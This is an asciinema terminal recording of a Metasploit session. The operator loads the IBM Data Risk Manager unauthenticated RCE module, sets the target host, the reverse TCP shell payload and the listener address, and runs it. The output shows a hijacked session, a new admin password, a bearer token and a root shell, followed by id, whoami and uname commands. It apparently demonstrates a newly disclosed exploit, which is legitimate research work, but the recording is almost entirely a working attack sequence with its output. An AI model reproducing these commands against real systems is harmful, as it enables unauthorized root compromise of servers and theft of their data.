{"version": 2, "width": 191, "height": 53, "timestamp": 1587456308, "env": {"SHELL": "/bin/bash", "TERM": "screen-256color"}}
[0.122909, "o", "\u001b[1m\u001b[38;5;11mmetasploit-framework\u001b[m\u000f\u001b[m\u000f\u001b[38;5;15m \u001b[1m\u001b[m\u000f\u001b[38;5;11m>\u001b[m\u000f\u001b[m\u000f\u001b[38;5;15m \u001b[m\u000f"]
[0.701499, "o", "exit"]
[0.841759, "o", "\b\b\b\b./msfconsole "]
[1.22209, "o", "\r\n"]
[11.449978, "o", "[*] Starting the Metasploit Framework console.../\r"]
[11.554914, "o", "[*] Starting the Metasploit Framework console...-\r"]
[11.656034, "o", "[*] Starting the Metasploit Framework console...\\\r"]
[11.756542, "o", "[*] starting the Metasploit Framework console...|\r"]
[11.856742, "o", "[*] STarting the Metasploit Framework console.../\r"]
[12.040343, "o", "[*] StArting the Metasploit Framework console...-\r"]
[12.120741, "o", "\u001b[1m\u001b[31m[-]\u001b[0m ***\r\n"]
[12.121076, "o", "\u001b[1m\u001b[31m[-]\u001b[0m * WARNING: No database support: No database YAML file\r\n"]
[12.12134, "o", "\u001b[1m\u001b[31m[-]\u001b[0m ***\r\n"]
[12.244798, "o", "[*] StaRting the Metasploit Framework console...\\\r"]
[12.442791, "o", "[*] StarTing the Metasploit Framework console...|\r"]
[12.542839, "o", "[*] StartIng the Metasploit Framework console.../\r"]
[12.643772, "o", "[*] StartiNg the Metasploit Framework console...-\r"]
[12.777612, "o", "[*] StartinG the Metasploit Framework console...\\\r"]
[12.877878, "o", "[*] Starting the Metasploit Framework console...|\r"]
[12.977967, "o", "[*] Starting The Metasploit Framework console.../\r"]
[13.078135, "o", "[*] Starting tHe Metasploit Framework console...-\r"]
[13.178468, "o", "[*] Starting thE Metasploit Framework console...\\\r"]
[13.278781, "o", "[*] Starting the Metasploit Framework console...|\r"]
[13.378913, "o", "[*] Starting the metasploit Framework console.../\r"]
[13.479364, "o", "[*] Starting the MEtasploit Framework console...-\r"]
[13.580236, "o", "[*] Starting the MeTasploit Framework console...\\\r"]
[13.680817, "o", "[*] Starting the MetAsploit Framework console...|\r"]
[13.781057, "o", "[*] Starting the MetaSploit Framework console.../\r"]
[13.881206, "o", "[*] Starting the MetasPloit Framework console...-\r"]
[13.981936, "o", "[*] Starting the MetaspLoit Framework console...\\\r"]
[14.082064, "o", "[*] Starting the MetasplOit Framework console...|\r"]
[14.18222, "o", "[*] Starting the MetasploIt Framework console.../\r"]
[14.283446, "o", "[*] Starting the MetasploiT Framework console...-\r"]
[14.38593, "o", "[*] Starting the Metasploit Framework console...\\\r"]
[14.486397, "o", "[*] Starting the Metasploit framework console...|\r"]
[14.589336, "o", "[*] Starting the Metasploit FRamework console.../\r"]
[14.689435, "o", "[*] Starting the Metasploit FrAmework console...-\r"]
[14.78971, "o", "[*] Starting the Metasploit FraMework console...\\\r"]
[14.892216, "o", "[*] Starting the Metasploit FramEwork console...|\r"]
[15.09251, "o", "[*] Starting the Metasploit FrameWork console.../\r"]
[15.193058, "o", "[*] Starting the Metasploit FramewOrk console...-\r"]
[15.29323, "o", "[*] Starting the Metasploit FramewoRk console...\\\r"]
[15.417834, "o", "[*] Starting the Metasploit FrameworK console...|\r"]
[15.517988, "o", "[*] Starting the Metasploit Framework console.../\r"]
[15.618088, "o", "[*] Starting the Metasploit Framework Console...-\r"]
[15.71823, "o", "[*] Starting the Metasploit Framework cOnsole...\\\r"]
[15.818472, "o", "[*] Starting the Metasploit Framework coNsole...|\r"]
[15.918584, "o", "[*] Starting the Metasploit Framework conSole.../\r"]
[16.01872, "o", "[*] Starting the Metasploit Framework consOle...-\r"]
[16.118844, "o", "[*] Starting the Metasploit Framework consoLe...\\\r"]
[16.218949, "o", "[*] Starting the Metasploit Framework consolE...|\r"]
[16.319145, "o", "[*] Starting the Metasploit Framework console.../\r"]
[16.419243, "o", "[*] Starting the Metasploit Framework console...-\r"]
[16.519498, "o", "[*] Starting the Metasploit Framework console...\\\r"]
[16.619614, "o", "[*] Starting the Metasploit Framework console...|\r"]
[16.719798, "o", "[*] Starting the Metasploit Framework console.../\r"]
[16.819917, "o", "[*] Starting the Metasploit Framework console...-\r"]
[16.920214, "o", "[*] Starting the Metasploit Framework console...\\\r"]
[17.021373, "o", "[*] starting the Metasploit Framework console...|\r"]
[17.131426, "o", "[*] STarting the Metasploit Framework console.../\r"]
[17.232188, "o", "[*] StArting the Metasploit Framework console...-\r"]
[17.332318, "o", "[*] StaRting the Metasploit Framework console...\\\r"]
[17.432421, "o", "[*] StarTing the Metasploit Framework console...|\r"]
[17.532575, "o", "[*] StartIng the Metasploit Framework console.../\r"]
[17.632672, "o", "[*] StartiNg the Metasploit Framework console...-\r"]
[17.733784, "o", "[*] StartinG the Metasploit Framework console...\\\r"]
[17.835098, "o", "[*] Starting the Metasploit Framework console...|\r"]
[17.93541, "o", "[*] Starting The Metasploit Framework console.../\r"]
[18.039161, "o", "[*] Starting tHe Metasploit Framework console...-\r"]
[18.1425, "o", "[*] Starting thE Metasploit Framework console...\\\r"]
[18.242625, "o", "[*] Starting the Metasploit Framework console...|\r"]
[18.343129, "o", "[*] Starting the metasploit Framework console.../\r"]
[18.447424, "o", "[*] Starting the MEtasploit Framework console...-\r"]
[18.547509, "o", "[*] Starting the MeTasploit Framework console...\\\r"]
[18.64762, "o", "[*] Starting the MetAsploit Framework console...|\r"]
[18.74774, "o", "[*] Starting the MetaSploit Framework console.../\r"]
[18.849418, "o", "[*] Starting the MetasPloit Framework console...-\r"]
[18.949548, "o", "[*] Starting the MetaspLoit Framework console...\\\r"]
[19.049773, "o", "[*] Starting the MetasplOit Framework console...|\r"]
[19.149937, "o", "[*] Starting the MetasploIt Framework console.../\r"]
[19.23995, "o", "\r                                                  \r\n"]
[19.240581, "o", "\u001b[0m"]
[19.242853, "o", "\u001b[36m\u001b[0m\r\n ______________________________________________________________________________\r\n|                                                                              |\r\n|                          \u001b[1m3Kom SuperHack II Logon\u001b[0m                             |\r\n|______________________________________________________________________________|\r\n|                                                                              |\r\n|                                                                              |\r\n|                                                                              |\r\n|                 User Name:          [   \u001b[31msecurity\u001b[0m    ]                        |\r\n|                                                                              |\r\n|                 Password:           [               ]                        |\r\n|                                                                              |\r\n|                                                                              |\r\n|            "]
[19.242935, "o", "                                                                  |\r\n|                                   \u001b[1m[ OK ]\u001b[0m                                     |\r\n|______________________________________________________________________________|\r\n|                                                                              |\r\n|                                                       https://metasploit.com |\r\n|______________________________________________________________________________|\u001b[0m\r\n\u001b[0m\r\n\r\n       =[ \u001b[33mmetasploit v5.0.0-dev-cbe83d4593\u001b[0m                ]\r\n+ -- --=[ 1845 exploits - 1045 auxiliary - 320 post       ]\r\n+ -- --=[ 541 payloads - 44 encoders - 10 nops            ]\r\n+ -- --=[ 2 evasion                                       ]\r\n+ -- --=[ ** This is Metasploit 5 development branch **   ]\r\n\r\n"]
[19.245337, "o", "\u001b[1m\u001b[34m[*]\u001b[0m Starting persistent handler(s)...\r\n"]
[19.38923, "o", "\u001b[4mmsf5\u001b[0m \u001b[0m> "]
[20.29008, "o", "\r(reverse-i-search)`': "]
[20.811605, "o", "\b\b\bu': rerun\b\b"]
[20.914614, "o", "\b\b\b\b\b\bs': use exploit/linux/http/ibm_drm_unauth_rce \r\u001b[C\u001b[C\u001b[C\u001b[C\u001b[C\u001b[C\u001b[C\u001b[C\u001b[C\u001b[C\u001b[C\u001b[C\u001b[C\u001b[C\u001b[C\u001b[C\u001b[C\u001b[C\u001b[C\u001b[C\u001b[C\u001b[C\u001b[C\u001b[C"]
[20.984781, "o", "\b\b\be': use exploit/linux/http/ibm_drm_unauth_rce \r\u001b[C\u001b[C\u001b[C\u001b[C\u001b[C\u001b[C\u001b[C\u001b[C\u001b[C\u001b[C\u001b[C\u001b[C\u001b[C\u001b[C\u001b[C\u001b[C\u001b[C\u001b[C\u001b[C\u001b[C\u001b[C\u001b[C\u001b[C\u001b[C\u001b[C"]
[21.918917, "o", "\r"]
[21.919386, "o", "\u001b[P\u001b[P\u001b[P\u001b[P\u001b[P\u001b[P\u001b[P\u001b[P\u001b[P\u001b[P\u001b[P\u001b[P\u001b[P\u001b[P\u001b[P\u001b[P\u001b[P\u001b[P\u001b[4mmsf5\u001b[0m \u001b[0m>\r\u001b[4mmsf5\u001b[0m \u001b[0m> "]
[21.919611, "o", "\r\r\n"]
[21.932331, "o", "\u001b[0m"]
[22.005387, "o", "\u001b[4mmsf5\u001b[0m exploit(\u001b[1m\u001b[31mlinux/http/ibm_drm_unauth_rce\u001b[0m) \u001b[0m> "]
[22.775968, "o", "\r"]
[22.776153, "o", "\u001b[P\u001b[P\u001b[P\u001b[P\u001b[P\u001b[P\u001b[P\u001b[P\u001b[P\u001b[P\u001b[P\u001b[P\u001b[P\u001b[P\u001b[P\u001b[P\u001b[P\u001b[P\u001b[P\u001b[P\u001b[P\u001b[P\u001b[P\u001b[P(reverse-i-search)`':\u001b[C"]
[23.20199, "o", "\b\b\b"]
[23.202112, "o", "r': use exploit/linux/http/ibm_drm_unauth_rce \b\b\b\b"]
[23.29611, "o", "\r\u001b[C\u001b[C\u001b[C\u001b[C\u001b[C\u001b[C\u001b[C\u001b[C\u001b[C\u001b[C\u001b[C\u001b[C\u001b[C\u001b[C\u001b[C\u001b[C\u001b[C\u001b[C\u001b[C\u001b[C"]
[23.296239, "o", "\u001b[P\u001b[P\u001b[P\u001b[P\u001b[P\u001b[P\u001b[P\u001b[P\u001b[P\u001b[P\u001b[P\u001b[P\u001b[P\u001b[P\u001b[P\u001b[P\u001b[P\u001b[P\u001b[P\u001b[Ph': set rhosts 10.10.10.213\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b"]
[24.086565, "o", "\r\u001b[4mmsf5\u001b[0m exploit(\u001b[1m\u001b[31mlinux/http/ibm_drm_unauth_rce\u001b[0m) \u001b[0m> set rhosts 10.10.10.213"]
[24.086664, "o", "\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b"]
[24.086746, "o", "\r"]
[24.086791, "o", "\r\n"]
[24.09242, "o", "\u001b[0m"]
[24.092826, "o", "rhosts => 10.10.10.213\r\n"]
[24.108325, "o", "\u001b[4mmsf5\u001b[0m exploit(\u001b[1m\u001b[31mlinux/http/ibm_drm_unauth_rce\u001b[0m) \u001b[0m> "]
[25.01023, "o", "\r"]
[25.010407, "o", "\u001b[P\u001b[P\u001b[P\u001b[P\u001b[P\u001b[P\u001b[P\u001b[P\u001b[P\u001b[P\u001b[P\u001b[P\u001b[P\u001b[P\u001b[P\u001b[P\u001b[P\u001b[P\u001b[P\u001b[P\u001b[P\u001b[P\u001b[P\u001b[P(reverse-i-search)`':\u001b[C"]
[26.29763, "o", "\b\b\bp': use exploit/linux/http/ibm_drm_unauth_rce \b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b"]
[26.523092, "o", "\r\u001b[C\u001b[C\u001b[C\u001b[C\u001b[C\u001b[C\u001b[C\u001b[C\u001b[C\u001b[C\u001b[C\u001b[C\u001b[C\u001b[C\u001b[C\u001b[C\u001b[C\u001b[C\u001b[C\u001b[C\u001b[Pa': set payload linux/x64/shell_reverse_tcp"]
[26.523211, "o", "\r\u001b[C\u001b[C\u001b[C\u001b[C\u001b[C\u001b[C\u001b[C\u001b[C\u001b[C\u001b[C\u001b[C\u001b[C\u001b[C\u001b[C\u001b[C\u001b[C\u001b[C\u001b[C\u001b[C\u001b[C\u001b[C\u001b[C\u001b[C\u001b[C\u001b[C\u001b[C\u001b[C\u001b[C"]
[27.420193, "o", "\r\u001b[4mmsf5\u001b[0m exploit(\u001b[1m\u001b[31mlinux/http/ibm_drm_unauth_rce\u001b[0m) \u001b[0m> set payload linux/x64/shell_reverse_tcp \b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\r\r\n"]
[27.426335, "o", "\u001b[0m"]
[27.434413, "o", "payload => linux/x64/shell_reverse_tcp\r\n"]
[27.461301, "o", "\u001b[4mmsf5\u001b[0m exploit(\u001b[1m\u001b[31mlinux/http/ibm_drm_unauth_rce\u001b[0m) \u001b[0m> "]
[28.082052, "o", "\r\u001b[P\u001b[P\u001b[P\u001b[P\u001b[P\u001b[P\u001b[P\u001b[P\u001b[P\u001b[P\u001b[P\u001b[P\u001b[P\u001b[P\u001b[P\u001b[P\u001b[P\u001b[P\u001b[P\u001b[P\u001b[P\u001b[P\u001b[P\u001b[P(reverse-i-search)`':"]
[28.082175, "o", "\u001b[C"]
[28.263545, "o", "\b\b\b"]
[28.264076, "o", "l': set payload linux/x64/shell_reverse_tcp \b\b\b\b\b\b\b\b\b\b\b\b\b\b"]
[28.497912, "o", "\r\u001b[C\u001b[C\u001b[C\u001b[C\u001b[C\u001b[C\u001b[C\u001b[C\u001b[C\u001b[C\u001b[C\u001b[C\u001b[C\u001b[C\u001b[C\u001b[C\u001b[C\u001b[C\u001b[C\u001b[C\u001b[P\u001b[P\u001b[P\u001b[P\u001b[P\u001b[P\u001b[P\u001b[P\u001b[P\u001b[P\u001b[P\u001b[P\u001b[P\u001b[P\u001b[P\u001b[P\u001b[P\u001b[P\u001b[P\u001b[P\u001b[Ph': set lhost 10.10.10.1\b\b\b\b\b\b\b\b\b\b\b\b\b\b"]
[29.409303, "o", "\r\u001b[4mmsf5\u001b[0m exploit(\u001b[1m\u001b[31mlinux/http/ibm_drm_unauth_rce\u001b[0m) \u001b[0m> set lhost 10.10.10.1"]
[29.413341, "o", "\b\b\b\b\b\b\b\b\b\b\b\b\b\b\r\r\n"]
[29.413654, "o", "\u001b[0m"]
[29.414641, "o", "lhost => 10.10.10.1\r\n"]
[29.431048, "o", "\u001b[4mmsf5\u001b[0m exploit(\u001b[1m\u001b[31mlinux/http/ibm_drm_unauth_rce\u001b[0m) \u001b[0m> "]
[31.608608, "o", "i"]
[31.808787, "o", "n"]
[32.081376, "o", "f"]
[32.215867, "o", "o"]
[32.789294, "o", "\r\r\n"]
[32.80057, "o", "\u001b[0m"]
[32.836966, "o", "\r\n       Name: IBM Data Risk Manager Unauthenticated Remote Code Execution\r\n     Module: exploit/linux/http/ibm_drm_unauth_rce\r\n   Platform: Linux\r\n       Arch: x86, x64\r\n Privileged: Yes\r\n    License: Metasploit Framework License (BSD)\r\n       Rank: Excellent\r\n  Disclosed: 2020-04-21\r\n\r\nProvided by:\r\n  Pedro Ribeiro <pedrib@gmail.com>\r\n\r\nAvailable targets:\r\n  Id  Name\r\n  --  ----\r\n  0   IBM Data Risk Manager <= 2.0.3 (<= 2.0.6 possibly affected)\r\n\r\nCheck supported:\r\n  Yes\r\n\r\nBasic options:\r\n  Name       Current Setting  Required  Description\r\n  ----       ---------------  --------  -----------\r\n  Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]\r\n  RHOSTS     10.10.10.213       yes       The target address range or CIDR identifier\r\n  RPORT      8443             yes       The target port (TCP)\r\n  SSL        true             yes       Connect with TLS\r\n  TARGETURI  /                yes       Default server path\r\n  VHOST                       no        HTTP server "]
[32.837031, "o", "virtual host\r\n\r\nPayload information:\r\n\r\nDescription:\r\n  IBM Data Risk Manager (IDRM) contains three vulnerabilities that can \r\n  be chained by an unauthenticated attacker to achieve remote code \r\n  execution as root. The first is an unauthenticated bypass, followed \r\n  by a command injection as the server user and finally abuse of an \r\n  insecure default password. This module exploits all three \r\n  vulnerabilities, giving the attacker a root shell. At the time of \r\n  disclosure, this is a 0 day. Versions 2.0.3 and below are confirmed \r\n  to be affected, and the latest 2.0.6 is most likely affected too.\r\n\r\nReferences:\r\n  https://cvedetails.com/cve/CVE-TODO/\r\n  https://cvedetails.com/cve/CVE-TODO/\r\n  https://cvedetails.com/cve/CVE-TODO/\r\n  TODO\r\n\r\n"]
[32.854243, "o", "\u001b[4mmsf5\u001b[0m exploit(\u001b[1m\u001b[31mlinux/http/ibm_drm_unauth_rce\u001b[0m) \u001b[0m> "]
[37.015767, "o", "r"]
[37.118367, "o", "u"]
[37.338912, "o", "n"]
[38.684533, "o", "\r\r\n"]
[38.698556, "o", "\u001b[0m"]
[38.720569, "o", "\r\n"]
[38.720702, "o", "\u001b[1m\u001b[34m[*]\u001b[0m Started reverse TCP handler on 10.10.10.1:4444 \r\n"]
[38.767685, "o", "\u001b[1m\u001b[32m[+]\u001b[0m 10.10.10.213:8443 - Successfully \"stickied\" our session ID gmlzlG\r\n"]
[38.901544, "o", "\u001b[1m\u001b[32m[+]\u001b[0m 10.10.10.213:8443 - We have obtained a new admin password 28010e88-6ffb-46e9-90d6-2ded732120d1\r\n"]
[39.029261, "o", "\u001b[1m\u001b[32m[+]\u001b[0m 10.10.10.213:8443 - ... and are authenticated as an admin!\r\n"]
[39.14202, "o", "\u001b[1m\u001b[34m[*]\u001b[0m 10.10.10.213:8443 - Detected IBM Data Risk Manager version 2.0.2 or above\r\n"]
[39.187022, "o", "\u001b[1m\u001b[32m[+]\u001b[0m 10.10.10.213:8443 - We have uploaded our payload... \r\n"]
[39.247815, "o", "\u001b[1m\u001b[32m[+]\u001b[0m 10.10.10.213:8443 - and our nmap script file!\r\n"]
[39.487503, "o", "\u001b[1m\u001b[32m[+]\u001b[0m 10.10.10.213:8443 - Bearer token 1b78100c-cf42-47fd-b64d-d36c07f1f934 obtained, wait for the final step where we invoke nmap...\r\n"]
[39.788568, "o", "\u001b[1m\u001b[32m[+]\u001b[0m 10.10.10.213:8443 - Shell incoming!\r\n"]
[40.06134, "o", "\u001b[1m\u001b[34m[*]\u001b[0m Command shell session 1 opened (10.10.10.1:4444 -> 10.10.10.213:56714) at 2020-04-21 15:05:48 +0700\r\n"]
[40.169463, "o", "\r\n"]
[40.169798, "o", "\u001b[0m"]
[42.323212, "o", "i"]
[42.44095, "o", "d"]
[42.636887, "o", "\r\n"]
[42.64045, "o", "uid=0(root) gid=0(root) groups=0(root)\r\n"]
[44.722507, "o", "w"]
[44.811039, "o", "h"]
[44.970336, "o", "o"]
[45.053554, "o", "a"]
[45.191308, "o", "m"]
[45.498992, "o", "i"]
[45.74675, "o", "\r\n"]
[45.749212, "o", "root\r\n"]
[46.606098, "o", "u"]
[46.799396, "o", "n"]
[46.880864, "o", "a"]
[46.953924, "o", "m"]
[47.087435, "o", "e"]
[47.232993, "o", " "]
[47.398902, "o", "-"]
[47.520507, "o", "a"]
[47.856042, "o", "\r\n"]
[47.858641, "o", "Linux idrm-server.ibm.com 3.10.0-862.3.2.el7.x86_64 #1 SMP Tue May 15 18:22:15 EDT 2018 x86_64 x86_64 x86_64 GNU/Linux\r\n"]
[49.32534, "o", "P"]
[49.899924, "o", "W"]
[50.251635, "o", "N"]
[50.33752, "o", "E"]
[50.439584, "o", "D"]
[51.085153, "o", "!"]
[51.502353, "o", "\r\n"]
[51.504091, "o", "/bin/sh: line 10: PWNED!: command not found\r\n"]
[53.828976, "o", "^C"]
[53.829427, "o", "\r\nAbort session 1? [y/N]  "]
[54.572201, "o", "y"]
[54.793714, "o", "\r\n"]
[54.793838, "o", "\"\"\r\n"]
[54.794144, "o", "\r\n"]
[54.794634, "o", "\u001b[1m\u001b[34m[*]\u001b[0m 10.10.10.213 - Command shell session 1 closed.  Reason: User exit\r\n"]
[54.822001, "o", "\u001b[4mmsf5\u001b[0m exploit(\u001b[1m\u001b[31mlinux/http/ibm_drm_unauth_rce\u001b[0m) \u001b[0m> "]
[54.977972, "o", "e"]
[55.419802, "o", "x"]
[55.569922, "o", "i"]
[55.699954, "o", "t"]
[55.879256, "o", "\r\r\n"]
[55.891726, "o", "\u001b[0m"]
[55.956356, "o", "\u001b[1m\u001b[38;5;11mmetasploit-framework\u001b[m\u000f\u001b[m\u000f\u001b[38;5;15m \u001b[1m\u001b[m\u000f\u001b[38;5;11m>\u001b[m\u000f\u001b[m\u000f\u001b[38;5;15m \u001b[m\u000f"]
[56.147525, "o", "e"]
[56.314851, "o", "x"]
[56.416656, "o", "i"]
[56.538841, "o", "t"]
[56.655915, "o", "\r\n"]
[56.656047, "o", "exit\r\n"]
